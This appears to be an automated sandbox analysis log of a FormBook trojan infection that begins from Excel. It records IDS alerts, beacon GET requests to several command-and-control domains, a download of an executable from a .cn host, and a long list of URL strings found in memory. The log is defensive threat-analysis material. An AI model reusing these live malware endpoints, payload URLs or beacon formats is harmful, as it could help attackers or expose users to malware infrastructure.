          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 52.209.107.24:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 198.185.159.144:80
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=iJ9LMG7JllwUjj0B/h8Hq4mQMyMQ8EbCXm6EYx1a/TSvaAWcoQp/LBKSuTwaNs+dq810vw==&RF=fra8 HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=IHh69a0FaxwHJYII63MYWBmxiBy1jb1SBL9x5Wu2Yyk1poaJdqJtBcBB1goaFgg5VAJZAg==&RF=fra8 HTTP/1.1Host: www.gourmetgroceriesfast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8 HTTP/1.1Host: www.stattests.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra8 HTTP/1.1Host: www.brainandbodystrengthcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra8 HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8 HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 100.24.208.97 100.24.208.97
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: global trafficHTTP traffic detected: GET /file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: medicelcoolers.cnConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2A0E6BB.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: medicelcoolers.cnConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=iJ9LMG7JllwUjj0B/h8Hq4mQMyMQ8EbCXm6EYx1a/TSvaAWcoQp/LBKSuTwaNs+dq810vw==&RF=fra8 HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=IHh69a0FaxwHJYII63MYWBmxiBy1jb1SBL9x5Wu2Yyk1poaJdqJtBcBB1goaFgg5VAJZAg==&RF=fra8 HTTP/1.1Host: www.gourmetgroceriesfast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&RF=fra8 HTTP/1.1Host: www.stattests.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra8 HTTP/1.1Host: www.brainandbodystrengthcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra8 HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8 HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: medicelcoolers.cn
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 18:58:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 5673Connection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: -1Vary: Accept-EncodingServer: AppDrag WebFrontAccess-Control-Allow-Origin: *Set-Cookie: lng=en; path=/; Expires=Fri, 26 Feb 2021 18:58:00 GMT;SameSite=Lax;X-Cloud-Cache: 0X-Cloud-Storage-Cache: 0Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, Cache-Control, Accept, Origin, X-Session-IDAccess-Control-Allow-Methods: GET, POST, PUT, PATCH, DELETE, OPTIONSData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 73 33 2d 65 75 2d 77 65 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 65 76 2e 61 70 70 64 72 61 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 2d 70 72 65 76 69 65 77 2f 63 6f 6e 66 69 67 2f 69 6e 64 65 78 2e 6a 70 67 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 6f 67 2d 69 6d 61 67 65 2d 77 69 64 74 68 2d 61 6e 64 2d 68 65 69 67 68 74 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 34 35 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 6f 67 2d 69 6d 61 67 65 2d 77 69 64 74 68 2d 61 6e 64 2d 68 65 69 67 68 74 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 32 33 36 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 74 68 65 6d 65 2d 74 6f 70 62 61 72 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 64 35 61 39 36 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6c 61 73 73 3d 22 61 70 70 64 72 61 67 2d 74 68 65 6d 65 2d 74 6f 70 62 61 72 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 64 35 61 39 36 22 3e 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport"> <title>Page not found - 404 Error</title>
          Source: explorer.exe, 0000000B.00000000.2200635919.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200635919.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 0000000B.00000000.2188458584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000B.00000000.2188458584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2184173591.0000000007960000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2381390031.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
